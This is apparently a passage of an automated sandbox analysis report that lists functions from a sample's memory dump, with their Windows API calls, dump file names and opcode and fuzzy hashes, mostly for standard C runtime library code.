String ID: string too long
API String ID: 2087764332-2556327735
Opcode ID: 16e2b025e0c37b64039d81f70d807e6c808cdb382518d07c534b8316afb7209e
Instruction ID: 1fe2b9478a415551c347e51c7f4f839e801492ca25604729f127a3731768f4e3
Opcode Fuzzy Hash: 16e2b025e0c37b64039d81f70d807e6c808cdb382518d07c534b8316afb7209e
Instruction Fuzzy Hash: A401D1B1D402099FCB04DFA4E846BDFBBB6FB45720F004239E91953740D339AA51CAE1

Function 00B1F4C2 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B1F86C: GetConsoleOutputCP.KERNEL32(2026DCDA,00000000,00000000,?), ref: 00B1F8CF

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00B156A2,?,00B15904), ref: 00B1F647
GetLastError.KERNEL32(?,00B156A2,?,00B15904,?,00B15904,?,?,?,?,?,?,?,00000000,?,?), ref: 00B1F651

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: c212afdcb5fd3c0f291b2c269dede4d6191f7cfc6ef52e0dc152d5dabe3b3093
Instruction ID: e2562025241409db8c53d4c46ff787e9e78a59f940b172dad16a11e6aca71730
Opcode Fuzzy Hash: c212afdcb5fd3c0f291b2c269dede4d6191f7cfc6ef52e0dc152d5dabe3b3093
Instruction Fuzzy Hash: 0361B2B190411AAFDF11CFA8D884AFE7BFAEF19304F5401A5E804A7262D731D991DB50

Function 00B1234A Relevance: 3.1, APIs: 2, Instructions: 94
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B13F3E: RaiseException.KERNEL32(E06D7363,00000001,00000003,00B120CA,?,?,?,00B12CC1,00B120CA,00B2D820,?,00B120CA,string too long,00B112D2), ref: 00B13F9F

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B12E92
___raise_securityfailure.LIBCMT ref: 00B12F7A

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
String ID:
API String ID: 3749517692-0
Opcode ID: 66692e992708b88b7648b78bbea7b39bc38c7b0fc0d2ac36f57149d5212c03a4
Instruction ID: eb54f79c0ef0766b662c09b3a0eaf17c30dc3e6c1cdc433a02a438ff4a43be7a
Opcode Fuzzy Hash: 66692e992708b88b7648b78bbea7b39bc38c7b0fc0d2ac36f57149d5212c03a4
Instruction Fuzzy Hash: 74318DB9400306DAC720DF54FD45AA43BF8BB19700F60817AF918C72B1EB709A87CB88

Function 00B1FC9B Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00B1F62D,?,00B15904,?,?,?,00000000), ref: 00B1FD37
GetLastError.KERNEL32(?,00B1F62D,?,00B15904,?,?,?,00000000,?,?,?,?,?,00B156A2,?,00B15904), ref: 00B1FD5D

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 7b313bce2754ffb86b70c45ac4dd3b9e426173288c127b048aec9eaf09ec72b8
Instruction ID: 902860fe5addb5076ad3ffda4d1b1943a68c652b7ab6f35a99d7726a4b3af7d8
Opcode Fuzzy Hash: 7b313bce2754ffb86b70c45ac4dd3b9e426173288c127b048aec9eaf09ec72b8
Instruction Fuzzy Hash: 8B216035A0021A9FCB25CF69DC809F9B7F9EB49701F6445FAE906D7251DA30DE82CB60

Function 00B1A59C Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00B1A48B,00B2DC40,0000000C), ref: 00B1A5E8
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00B1A48B,00B2DC40,0000000C), ref: 00B1A5FA

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 6640579970d8c71d296e4cdb00c85b6b98a94cbea9885c62bf6f8723d702bf4e
Instruction ID: 8670bbf1ea30760189dc5a35c500bfe48bd8c2aac28f3ac65f723826098d0a41
Opcode Fuzzy Hash: 6640579970d8c71d296e4cdb00c85b6b98a94cbea9885c62bf6f8723d702bf4e
Instruction Fuzzy Hash: 0F11DA7150970146C7304E3D8C986A2BAD5EB66370B7C079AE0B6C75F1CA30F9C3D252

Function 00B170B7 Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00B2D900,0000000C), ref: 00B170CA
ExitThread.KERNEL32 ref: 00B170D1

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 66509a772f5409175a2221937b2b8086138485a56e06e8f46bfb950851497c71
Instruction ID: 78336aa20a02c3267f464db19bcf6b8b262676a0a5e55b5ca1da717189a46821
Opcode Fuzzy Hash: 66509a772f5409175a2221937b2b8086138485a56e06e8f46bfb950851497c71
Instruction Fuzzy Hash: E0F0AF719442089FDB11ABB0D84AAAE3BF4EF04711F600188F005972A2CF705981CBE1

Function 00B19C89 Relevance: 1.6, APIs: 1, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fae5a639f74acc2584650ca8a15c504493a14132127c972e0df620d98863a41f
Instruction ID: 5365c25918e333c26170b59b10b217bf543ee1b4ee2920ad2f48ed9495d0e6cf
Opcode Fuzzy Hash: fae5a639f74acc2584650ca8a15c504493a14132127c972e0df620d98863a41f
Instruction Fuzzy Hash: F70124332002659FDB228F69FC94EAA37E5FBC17207A44564F925CB194DF30E882C780

Function 00B1B8D6 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00B1AB77,?,?,00B1AB77,00000220,?,00000000,?), ref: 00B1B908

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ee9f025ba6b3251c09dcb1d92a46ffb8a438e0034c80daa88217a01c4d323813
Instruction ID: aa5763ea8c0928cb019452ea5068535ddcbcc72bc3c0e6d57bcea3787569e2a8
Opcode Fuzzy Hash: ee9f025ba6b3251c09dcb1d92a46ffb8a438e0034c80daa88217a01c4d323813
Instruction Fuzzy Hash: 9FE06D31606221A6DA313B669C05FEA7ADCDB45BF0F9501E5ED18E7292CF20CDC295F4

Non-executed Functions

Function 00B21A10 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7946e7d3bd8a4c71b1004167feaff1146a0b4289e9922db4fb30fff94b398ee0
Instruction ID: 5cd0f5742f933ad2a3c024357ac2297cf66d4d1e57434ae55f07316052fc7157
Opcode Fuzzy Hash: 7946e7d3bd8a4c71b1004167feaff1146a0b4289e9922db4fb30fff94b398ee0
Instruction Fuzzy Hash: BF024B71E012299BDF14CFADD8806AEFBF1FF58314F2586A9D919A7340D731AA41CB90

Function 00B1D922 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B1DA12

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 60f85b7ff0cec1f790b478a7cb14999168c69ce40cceb967d390e797c8116a4a
Instruction ID: 9c83013df833761c15c8d1fc97cf0a4d85bcf6c77478fa312d1c35cd8ebfb4fa
Opcode Fuzzy Hash: 60f85b7ff0cec1f790b478a7cb14999168c69ce40cceb967d390e797c8116a4a
Instruction Fuzzy Hash: 5371C2B1909158AFDF20EF288C99AEABBF9EF05300F9441D9E449A7251DA349EC58F50

Function 00B139F1 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00B139FD
IsDebuggerPresent.KERNEL32 ref: 00B13AC9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B13AE2
UnhandledExceptionFilter.KERNEL32(?), ref: 00B13AEC

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 5cea76fc93addd7c9057282404e6434392fc560dbc06277765dacec6df06628f
Instruction ID: 6cac6d9cf2ece979dad1014b69e65b691488f8165247283872a389ea05545b99
Opcode Fuzzy Hash: 5cea76fc93addd7c9057282404e6434392fc560dbc06277765dacec6df06628f
Instruction Fuzzy Hash: F431E4B5D052189ADB21DFA4D9897CDBBF8AF08740F5041EAE40DAB250EB709B85CF45

Function 00B18077 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B1816F
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B18179
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00B18186

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 56f025079f0b04e02f2224b3269d6c69b2f2d4ca5a66d3ca1473c8104b3bb105
Instruction ID: 821056600d4a69f743d5f942d7542feda291338d7884df047022e385ed439e73
Opcode Fuzzy Hash: 56f025079f0b04e02f2224b3269d6c69b2f2d4ca5a66d3ca1473c8104b3bb105
Instruction Fuzzy Hash: 9731B175901228ABCB21DF68DC897CDBBF8BF48350F5045EAE41CA7250EB709B858F44

Function 00B1D871 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1B78E: HeapAlloc.KERNEL32(00000008,?,?,?,00B19EC4,00000001,00000364,?,00000006,000000FF,?,00B170DC,00B2D900,0000000C), ref: 00B1B7CF

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B1DA12
FindNextFileW.KERNEL32(00000000,?), ref: 00B1DB06
FindClose.KERNEL32(00000000), ref: 00B1DB45
FindClose.KERNEL32(00000000), ref: 00B1DB78

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: a087ebfab28e839c75016eb44e0e9eb49df3754fc28cd64ddcd5997aa17bb8bb
Instruction ID: 024de52497023c1ef913fe27ed2897c6c90d6b0902d8df141ea1b1f8f142f2e3
Opcode Fuzzy Hash: a087ebfab28e839c75016eb44e0e9eb49df3754fc28cd64ddcd5997aa17bb8bb
Instruction Fuzzy Hash: AE516876900218AFDF24AF289C84AFE77F9DF85344F9441E9F419D7201EA309DC28B60

Function 00B139E5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00003B06,00B1349D), ref: 00B139EA

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 130be00385508ae16c16007af8b9e56f833dd168f9a9a347096865a072d1289a
Instruction ID: 685e6f8501f79163b67bfd78d063f0ef4951d0f80767d1a92d4fc08f72568253
Opcode Fuzzy Hash: 130be00385508ae16c16007af8b9e56f833dd168f9a9a347096865a072d1289a
Instruction Fuzzy Hash:

Function 00B19E16 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00B19E16

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: f6e5aa711b3f23b60336f889f3198b201aa723ff416b523874cdf0c2a9f7a9ff
Instruction ID: 6c1a67792e87a2a884aad50907b66d4ce68476af65d1f7cce99a8234a3a7f6b6
Opcode Fuzzy Hash: f6e5aa711b3f23b60336f889f3198b201aa723ff416b523874cdf0c2a9f7a9ff
Instruction Fuzzy Hash: 63A001716062029B97608F36AA0931D7AA9BA466E17058079A809C7164EF2485A3AF81

Function 00B23FDE Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00D50AD8,00D50AD8,00000000,7FFFFFFF,?,00B23FC9,00D50AD8,00D50AD8,00000000,00D50AD8,?,?,?,?,00D50AD8,00000000), ref: 00B24084
__alloca_probe_16.LIBCMT ref: 00B2413F
__alloca_probe_16.LIBCMT ref: 00B241CE
__freea.LIBCMT ref: 00B24219
__freea.LIBCMT ref: 00B2421F
__freea.LIBCMT ref: 00B24255
__freea.LIBCMT ref: 00B2425B
__freea.LIBCMT ref: 00B2426B

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: b8a764fb690ebc53add8cc3dfcfe99afc6ec87aeb85041ec6f2b66346f2b8a5a
Instruction ID: c9b868440b1bb31594602f582a1ad2978c22a9a004cd06b378e766ccde9b0f00
Opcode Fuzzy Hash: b8a764fb690ebc53add8cc3dfcfe99afc6ec87aeb85041ec6f2b66346f2b8a5a
Instruction Fuzzy Hash: 6F71D532900225ABDF219F95EC81BEF7BE9EF49710F2901D9F90CA7681D7359D8087A0

Function 00B1C28B Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B1C311

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 6f50279ee7fba881e46e44fc6ac24256dd30adf8a6b45f72db007344eb616516
Instruction ID: 43a72728254232e753b271b759db55c3b71f2aea0773b2d95d3cee9139976de7
Opcode Fuzzy Hash: 6f50279ee7fba881e46e44fc6ac24256dd30adf8a6b45f72db007344eb616516
Instruction Fuzzy Hash: 99B16672A44265AFDB118F68CC82BFE7FE5EF55310F5481D6E804AB382D330A981C7A4

Function 00B14650 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B14687
___except_validate_context_record.LIBVCRUNTIME ref: 00B1468F
_ValidateLocalCookies.LIBCMT ref: 00B14718
__IsNonwritableInCurrentImage.LIBCMT ref: 00B14743
_ValidateLocalCookies.LIBCMT ref: 00B14798

Strings

csm, xrefs: 00B1472D

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 7589c1420c2d5979131227e162199694b1fa80644d7f377756f1c37c2222f5d1
